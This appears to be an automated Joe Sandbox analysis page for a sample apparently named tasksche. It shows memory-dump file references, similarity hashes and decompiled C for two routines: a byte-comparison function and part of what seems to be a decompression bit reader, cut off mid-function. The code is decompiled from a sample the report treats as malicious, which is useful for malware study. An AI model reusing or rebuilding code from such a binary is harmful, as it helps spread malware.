                                                                                              0x0041b4cb
                                                                                              0x0041b4cf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b4cf
                                                                                              0x0041b0d2
                                                                                              0x0041b0d2
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                              • Instruction ID: 29e0c2194e43b481a6c61040bafb45c2199937250b84d4f9493dc4b244529513
                                                                                              • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                              • Instruction Fuzzy Hash: 24C16E73C0E9B30A8736812D81685ABEE62AFD175031FC3A2DCE42F389D36B5D9195D4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0041B0D9(void* __eax, void* __ecx) {
                                                                                              				void* _t177;
                                                                                              				signed int _t178;
                                                                                              				void* _t181;
                                                                                              				signed char _t187;
                                                                                              				signed char _t188;
                                                                                              				signed char _t189;
                                                                                              				signed char _t191;
                                                                                              				signed char _t192;
                                                                                              				signed int _t198;
                                                                                              				signed int _t284;
                                                                                              				void* _t287;
                                                                                              				void* _t289;
                                                                                              				void* _t291;
                                                                                              				void* _t293;
                                                                                              				void* _t295;
                                                                                              				void* _t297;
                                                                                              				void* _t300;
                                                                                              				void* _t302;
                                                                                              				void* _t304;
                                                                                              				void* _t307;
                                                                                              				void* _t309;
                                                                                              				void* _t311;
                                                                                              				void* _t314;
                                                                                              				void* _t316;
                                                                                              				void* _t318;
                                                                                              				void* _t321;
                                                                                              				void* _t323;
                                                                                              				void* _t325;
                                                                                              
                                                                                              				_t181 = __ecx;
                                                                                              				_t177 = __eax;
                                                                                              				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                                                                                              					_t284 = 0;
                                                                                              					L11:
                                                                                              					if(_t284 != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					_t187 =  *(_t177 - 0x18);
                                                                                              					if(_t187 ==  *(_t181 - 0x18)) {
                                                                                              						_t284 = 0;
                                                                                              						L22:
                                                                                              						if(_t284 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						_t188 =  *(_t177 - 0x14);
                                                                                              						if(_t188 ==  *(_t181 - 0x14)) {
                                                                                              							_t284 = 0;
                                                                                              							L33:
                                                                                              							if(_t284 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							_t189 =  *(_t177 - 0x10);
                                                                                              							if(_t189 ==  *(_t181 - 0x10)) {
                                                                                              								_t284 = 0;
                                                                                              								L44:
                                                                                              								if(_t284 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                                                                                              									_t284 = 0;
                                                                                              									L55:
                                                                                              									if(_t284 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									_t191 =  *(_t177 - 8);
                                                                                              									if(_t191 ==  *(_t181 - 8)) {
                                                                                              										_t284 = 0;
                                                                                              										L66:
                                                                                              										if(_t284 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										_t192 =  *(_t177 - 4);
                                                                                              										if(_t192 ==  *(_t181 - 4)) {
                                                                                              											_t178 = 0;
                                                                                              											L78:
                                                                                              											if(_t178 == 0) {
                                                                                              												_t178 = 0;
                                                                                              											}
                                                                                              											L80:
                                                                                              											return _t178;
                                                                                              										}
                                                                                              										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                                                                                              										if(_t287 == 0) {
                                                                                              											L70:
                                                                                              											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                                                                                              											if(_t289 == 0) {
                                                                                              												L72:
                                                                                              												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                                                                                              												if(_t291 == 0) {
                                                                                              													L75:
                                                                                              													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                                                                                              													if(_t178 != 0) {
                                                                                              														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
                                                                                              													}
                                                                                              													goto L78;
                                                                                              												}
                                                                                              												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
                                                                                              												if(_t198 == 0) {
                                                                                              													goto L75;
                                                                                              												}
                                                                                              												L74:
                                                                                              												_t178 = _t198;
                                                                                              												goto L78;
                                                                                              											}
                                                                                              											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
                                                                                              											if(_t198 != 0) {
                                                                                              												goto L74;
                                                                                              											}
                                                                                              											goto L72;
                                                                                              										}
                                                                                              										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                                                                                              										if(_t198 != 0) {
                                                                                              											goto L74;
                                                                                              										}
                                                                                              										goto L70;
                                                                                              									}
                                                                                              									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                                                                                              									if(_t293 == 0) {
                                                                                              										L59:
                                                                                              										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                                                                                              										if(_t295 == 0) {
                                                                                              											L61:
                                                                                              											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                                                                                              											if(_t297 == 0) {
                                                                                              												L63:
                                                                                              												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                                                                                              												if(_t284 != 0) {
                                                                                              													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                              												}
                                                                                              												goto L66;
                                                                                              											}
                                                                                              											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
                                                                                              											if(_t284 != 0) {
                                                                                              												goto L1;
                                                                                              											}
                                                                                              											goto L63;
                                                                                              										}
                                                                                              										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
                                                                                              										if(_t284 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										goto L61;
                                                                                              									}
                                                                                              									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
                                                                                              									if(_t284 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L59;
                                                                                              								}
                                                                                              								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                                                                                              								if(_t300 == 0) {
                                                                                              									L48:
                                                                                              									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                                                                                              									if(_t302 == 0) {
                                                                                              										L50:
                                                                                              										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                                                                                              										if(_t304 == 0) {
                                                                                              											L52:
                                                                                              											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                                                                                              											if(_t284 != 0) {
                                                                                              												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                              											}
                                                                                              											goto L55;
                                                                                              										}
                                                                                              										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
                                                                                              										if(_t284 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										goto L52;
                                                                                              									}
                                                                                              									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
                                                                                              									if(_t284 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L50;
                                                                                              								}
                                                                                              								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
                                                                                              								if(_t284 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L48;
                                                                                              							}
                                                                                              							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                                                                                              							if(_t307 == 0) {
                                                                                              								L37:
                                                                                              								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                                                                                              								if(_t309 == 0) {
                                                                                              									L39:
                                                                                              									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                                                                                              									if(_t311 == 0) {
                                                                                              										L41:
                                                                                              										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                                                                                              										if(_t284 != 0) {
                                                                                              											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                              										}
                                                                                              										goto L44;
                                                                                              									}
                                                                                              									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
                                                                                              									if(_t284 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L41;
                                                                                              								}
                                                                                              								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                              								if(_t284 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L39;
                                                                                              							}
                                                                                              							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
                                                                                              							if(_t284 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L37;
                                                                                              						}
                                                                                              						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                                                                                              						if(_t314 == 0) {
                                                                                              							L26:
                                                                                              							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                                                                                              							if(_t316 == 0) {
                                                                                              								L28:
                                                                                              								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                                                                                              								if(_t318 == 0) {
                                                                                              									L30:
                                                                                              									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                                                                                              									if(_t284 != 0) {
                                                                                              										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                              									}
                                                                                              									goto L33;
                                                                                              								}
                                                                                              								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                                                                                              								if(_t284 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L30;
                                                                                              							}
                                                                                              							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                              							if(_t284 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L28;
                                                                                              						}
                                                                                              						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                                                                                              						if(_t284 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L26;
                                                                                              					}
                                                                                              					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                                                                                              					if(_t321 == 0) {
                                                                                              						L15:
                                                                                              						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                                                                                              						if(_t323 == 0) {
                                                                                              							L17:
                                                                                              							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                                                                                              							if(_t325 == 0) {
                                                                                              								L19:
                                                                                              								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                                                                                              								if(_t284 != 0) {
                                                                                              									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                              								}
                                                                                              								goto L22;
                                                                                              							}
                                                                                              							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                              							if(_t284 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L19;
                                                                                              						}
                                                                                              						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                              						if(_t284 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L17;
                                                                                              					}
                                                                                              					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                              					if(_t284 != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					goto L15;
                                                                                              				} else {
                                                                                              					__esi = __dl & 0x000000ff;
                                                                                              					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                              					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                              					if(__esi == 0) {
                                                                                              						L4:
                                                                                              						__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                              						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                              						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                              						if(__esi == 0) {
                                                                                              							L6:
                                                                                              							__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                              							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                              							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                              							if(__esi == 0) {
                                                                                              								L8:
                                                                                              								__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                              								__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                              								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                              								if(__esi != 0) {
                                                                                              									0 = 0 | __esi > 0x00000000;
                                                                                              									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                              								}
                                                                                              								goto L11;
                                                                                              							}
                                                                                              							0 = 0 | __esi > 0x00000000;
                                                                                              							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              							__esi = __edx;
                                                                                              							if(__edx != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L8;
                                                                                              						}
                                                                                              						0 = 0 | __esi > 0x00000000;
                                                                                              						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              						__esi = __edx;
                                                                                              						if(__edx != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L6;
                                                                                              					}
                                                                                              					0 = 0 | __esi > 0x00000000;
                                                                                              					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              					__esi = __edx;
                                                                                              					if(__edx != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					goto L4;
                                                                                              				}
                                                                                              				L1:
                                                                                              				_t178 = _t284;
                                                                                              				goto L80;
                                                                                              			}































                                                                                              0x0041b0d9
                                                                                              0x0041b0d9
                                                                                              0x0041b0df
                                                                                              0x0041b152
                                                                                              0x0041b154
                                                                                              0x0041b156
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b15c
                                                                                              0x0041b162
                                                                                              0x0041b1e1
                                                                                              0x0041b1e3
                                                                                              0x0041b1e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b1eb
                                                                                              0x0041b1f1
                                                                                              0x0041b270
                                                                                              0x0041b272
                                                                                              0x0041b274
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b27a
                                                                                              0x0041b280
                                                                                              0x0041b2ff
                                                                                              0x0041b301
                                                                                              0x0041b303
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b30f
                                                                                              0x0041b38f
                                                                                              0x0041b391
                                                                                              0x0041b393
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b399
                                                                                              0x0041b39f
                                                                                              0x0041b41e
                                                                                              0x0041b420
                                                                                              0x0041b422
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b428
                                                                                              0x0041b42e
                                                                                              0x0041b49f
                                                                                              0x0041b4a1
                                                                                              0x0041b4a3
                                                                                              0x0041b4a5
                                                                                              0x0041b4a5
                                                                                              0x0041b4a7
                                                                                              0x0041c203
                                                                                              0x0041c203
                                                                                              0x0041b437
                                                                                              0x0041b439
                                                                                              0x0041b44a
                                                                                              0x0041b452
                                                                                              0x0041b454
                                                                                              0x0041b465
                                                                                              0x0041b46d
                                                                                              0x0041b46f
                                                                                              0x0041b484
                                                                                              0x0041b48c
                                                                                              0x0041b48e
                                                                                              0x0041b49b
                                                                                              0x0041b49b
                                                                                              0x00000000
                                                                                              0x0041b48e
                                                                                              0x0041b478
                                                                                              0x0041b47e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b480
                                                                                              0x0041b480
                                                                                              0x00000000
                                                                                              0x0041b480
                                                                                              0x0041b45d
                                                                                              0x0041b463
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b463
                                                                                              0x0041b442
                                                                                              0x0041b448
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b448
                                                                                              0x0041b3a8
                                                                                              0x0041b3aa
                                                                                              0x0041b3c1
                                                                                              0x0041b3c9
                                                                                              0x0041b3cb
                                                                                              0x0041b3e2
                                                                                              0x0041b3ea
                                                                                              0x0041b3ec
                                                                                              0x0041b403
                                                                                              0x0041b40b
                                                                                              0x0041b40d
                                                                                              0x0041b41a
                                                                                              0x0041b41a
                                                                                              0x00000000
                                                                                              0x0041b40d
                                                                                              0x0041b3f9
                                                                                              0x0041b3fd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b3fd
                                                                                              0x0041b3d8
                                                                                              0x0041b3dc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b3dc
                                                                                              0x0041b3b7
                                                                                              0x0041b3bb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b3bb
                                                                                              0x0041b319
                                                                                              0x0041b31b
                                                                                              0x0041b332
                                                                                              0x0041b33a
                                                                                              0x0041b33c
                                                                                              0x0041b353
                                                                                              0x0041b35b
                                                                                              0x0041b35d
                                                                                              0x0041b374
                                                                                              0x0041b37c
                                                                                              0x0041b37e
                                                                                              0x0041b38b
                                                                                              0x0041b38b
                                                                                              0x00000000
                                                                                              0x0041b37e
                                                                                              0x0041b36a
                                                                                              0x0041b36e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b36e
                                                                                              0x0041b349
                                                                                              0x0041b34d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b34d
                                                                                              0x0041b328
                                                                                              0x0041b32c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b32c
                                                                                              0x0041b289
                                                                                              0x0041b28b
                                                                                              0x0041b2a2
                                                                                              0x0041b2aa
                                                                                              0x0041b2ac
                                                                                              0x0041b2c3
                                                                                              0x0041b2cb
                                                                                              0x0041b2cd
                                                                                              0x0041b2e4
                                                                                              0x0041b2ec
                                                                                              0x0041b2ee
                                                                                              0x0041b2fb
                                                                                              0x0041b2fb
                                                                                              0x00000000
                                                                                              0x0041b2ee
                                                                                              0x0041b2da
                                                                                              0x0041b2de
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b2de
                                                                                              0x0041b2b9
                                                                                              0x0041b2bd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b2bd
                                                                                              0x0041b298
                                                                                              0x0041b29c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b29c
                                                                                              0x0041b1fa
                                                                                              0x0041b1fc
                                                                                              0x0041b213
                                                                                              0x0041b21b
                                                                                              0x0041b21d
                                                                                              0x0041b234
                                                                                              0x0041b23c
                                                                                              0x0041b23e
                                                                                              0x0041b255
                                                                                              0x0041b25d
                                                                                              0x0041b25f
                                                                                              0x0041b26c
                                                                                              0x0041b26c
                                                                                              0x00000000
                                                                                              0x0041b25f
                                                                                              0x0041b24b
                                                                                              0x0041b24f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b24f
                                                                                              0x0041b22a
                                                                                              0x0041b22e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b22e
                                                                                              0x0041b209
                                                                                              0x0041b20d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b20d
                                                                                              0x0041b16b
                                                                                              0x0041b16d
                                                                                              0x0041b184
                                                                                              0x0041b18c
                                                                                              0x0041b18e
                                                                                              0x0041b1a5
                                                                                              0x0041b1ad
                                                                                              0x0041b1af
                                                                                              0x0041b1c6
                                                                                              0x0041b1ce
                                                                                              0x0041b1d0
                                                                                              0x0041b1dd
                                                                                              0x0041b1dd
                                                                                              0x00000000
                                                                                              0x0041b1d0
                                                                                              0x0041b1bc
                                                                                              0x0041b1c0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b1c0
                                                                                              0x0041b19b
                                                                                              0x0041b19f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b19f
                                                                                              0x0041b17a
                                                                                              0x0041b17e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b0e1
                                                                                              0x0041b0e1
                                                                                              0x0041b0e4
                                                                                              0x0041b0e8
                                                                                              0x0041b0ea
                                                                                              0x0041b0fd
                                                                                              0x0041b0fd
                                                                                              0x0041b101
                                                                                              0x0041b105
                                                                                              0x0041b107
                                                                                              0x0041b11a
                                                                                              0x0041b11a
                                                                                              0x0041b11e
                                                                                              0x0041b122
                                                                                              0x0041b124
                                                                                              0x0041b137
                                                                                              0x0041b137
                                                                                              0x0041b13b
                                                                                              0x0041b13f
                                                                                              0x0041b141
                                                                                              0x0041b147
                                                                                              0x0041b14a
                                                                                              0x0041b14e
                                                                                              0x0041b14e
                                                                                              0x00000000
                                                                                              0x0041b141
                                                                                              0x0041b12a
                                                                                              0x0041b12d
                                                                                              0x0041b131
                                                                                              0x0041b135
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b135
                                                                                              0x0041b10d
                                                                                              0x0041b110
                                                                                              0x0041b114
                                                                                              0x0041b118
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b118
                                                                                              0x0041b0f0
                                                                                              0x0041b0f3
                                                                                              0x0041b0f7
                                                                                              0x0041b0fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b0fb
                                                                                              0x0041b0d2
                                                                                              0x0041b0d2
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                              • Instruction ID: 2db7ca3506525dcc090db9a2522c638e963424884ad3e69ae6d01f57f6380b46
                                                                                              • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                              • Instruction Fuzzy Hash: 7AC17173D0E9B3068735812E84686ABEE62AFD175031FC3E29CE42F389D32B5D9495D4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E0041462B(void* __ebx, intOrPtr __ecx, intOrPtr* _a4, signed int _a8, intOrPtr _a12) {
                                                                                              				intOrPtr _v8;
                                                                                              				char _v28;
                                                                                              				char _v74;
                                                                                              				char _v90;
                                                                                              				char _v154;
                                                                                              				char _v460;
                                                                                              				signed int _t93;
                                                                                              				unsigned int _t94;
                                                                                              				signed int _t97;
                                                                                              				signed int _t98;
                                                                                              				unsigned int _t111;
                                                                                              				unsigned int _t116;
                                                                                              				unsigned int _t120;
                                                                                              				signed int _t122;
                                                                                              				void* _t131;
                                                                                              				signed int _t132;
                                                                                              				signed int _t133;
                                                                                              				signed int _t134;
                                                                                              				unsigned int _t152;
                                                                                              				void* _t154;
                                                                                              				intOrPtr* _t156;
                                                                                              				intOrPtr _t162;
                                                                                              				intOrPtr* _t166;
                                                                                              				void* _t167;
                                                                                              				signed int _t170;
                                                                                              				signed int _t174;
                                                                                              				signed int _t178;
                                                                                              				unsigned int _t180;
                                                                                              				intOrPtr* _t182;
                                                                                              				intOrPtr _t183;
                                                                                              				intOrPtr* _t186;
                                                                                              				intOrPtr _t187;
                                                                                              				void* _t190;
                                                                                              
                                                                                              				_t131 = __ebx;
                                                                                              				_v8 = __ecx;
                                                                                              				if( *((char*)(_a8 + 0x11)) != 0) {
                                                                                              					_t186 = _a4;
                                                                                              					__eflags =  *((char*)(_t186 + 8));
                                                                                              					if( *((char*)(_t186 + 8)) != 0) {
                                                                                              						L5:
                                                                                              						_t7 =  &_a8;
                                                                                              						 *_t7 = _a8 & 0x00000000;
                                                                                              						__eflags =  *_t7;
                                                                                              						_push(_t131);
                                                                                              						do {
                                                                                              							_t132 = E004097D1(_t186) >> 0x0000000c & 0x000000ff;
                                                                                              							E004097BA(_t186, 4);
                                                                                              							__eflags = _t132 - 0xf;
                                                                                              							if(_t132 != 0xf) {
                                                                                              								 *(_t190 + _a8 - 0x18) = _t132;
                                                                                              								goto L15;
                                                                                              							}
                                                                                              							_t178 = E004097D1(_t186) >> 0x0000000c & 0x000000ff;
                                                                                              							E004097BA(_t186, 4);
                                                                                              							__eflags = _t178;
                                                                                              							if(_t178 != 0) {
                                                                                              								_t180 = _t178 + 2;
                                                                                              								while(1) {
                                                                                              									__eflags = _t180;
                                                                                              									if(_t180 <= 0) {
                                                                                              										break;
                                                                                              									}
                                                                                              									_t180 = _t180 - 1;
                                                                                              									__eflags = _a8 - 0x14;
                                                                                              									if(_a8 >= 0x14) {
                                                                                              										break;
                                                                                              									}
                                                                                              									_t14 =  &_a8;
                                                                                              									 *_t14 = _a8 + 1;
                                                                                              									__eflags =  *_t14;
                                                                                              									 *(_t190 + _a8 - 0x18) = 0;
                                                                                              								}
                                                                                              								_a8 = _a8 - 1;
                                                                                              								goto L15;
                                                                                              							}
                                                                                              							 *(_t190 + _a8 - 0x18) = _t132;
                                                                                              							L15:
                                                                                              							_a8 = _a8 + 1;
                                                                                              							__eflags = _a8 - 0x14;
                                                                                              						} while (__eflags < 0);
                                                                                              						_t182 = _a12 + 0x3bb0;
                                                                                              						E0041284B(__eflags,  &_v28, _t182, 0x14);
                                                                                              						_t29 =  &_a8;
                                                                                              						 *_t29 = _a8 & 0x00000000;
                                                                                              						__eflags =  *_t29;
                                                                                              						do {
                                                                                              							__eflags =  *((char*)(_t186 + 8));
                                                                                              							if( *((char*)(_t186 + 8)) != 0) {
                                                                                              								L20:
                                                                                              								_t93 = E0040978C(_t186);
                                                                                              								_t133 =  *(_t182 + 0x84);
                                                                                              								_t94 = _t93 & 0x0000fffe;
                                                                                              								__eflags = _t94 -  *((intOrPtr*)(_t182 + 4 + _t133 * 4));
                                                                                              								if(_t94 >=  *((intOrPtr*)(_t182 + 4 + _t133 * 4))) {
                                                                                              									_t174 = 0xf;
                                                                                              									_t134 = _t133 + 1;
                                                                                              									__eflags = _t134 - _t174;
                                                                                              									if(_t134 >= _t174) {
                                                                                              										L28:
